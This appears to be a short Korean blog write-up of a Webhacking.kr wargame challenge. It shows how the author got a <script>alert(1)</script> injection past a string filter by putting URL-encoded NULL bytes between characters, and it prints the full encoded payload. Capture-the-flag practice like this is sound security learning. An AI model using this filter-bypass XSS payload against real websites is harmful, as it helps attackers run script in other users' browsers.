URL 인코딩 문제
위의 폼으로 <script>alert(1);</script> 를 삽입해야 한다.
문자열이 필터링 되는 것 같다.
문자열 필터링을 우회하는 방법을 찾아보니, 문자 사이사이마다 NULL 을 넣어주는 방법이 있었다.
-> NULL 값을 url 인코딩으로 사이사이에 넣는다.
<%00s%00c%00r%00i%00p%00t%00>%00a%00l%00e%00r%00t%00(%001%00)%00;%00<%00/%00s%00c%00r%00i%00p%00t%00>
'Wargame > Webhacking.kr' 카테고리의 다른 글
| [Webhacking.kr] 25번 (0) | 2021.05.17 |
|---|---|
| [Webhacking.kr] 24번 (0) | 2021.05.17 |
| [Webhacking.kr] 20번 (0) | 2021.05.14 |
| [Webhacking.kr] 19번 (0) | 2021.05.14 |
| [Webhacking.kr] 18번 (0) | 2021.05.13 |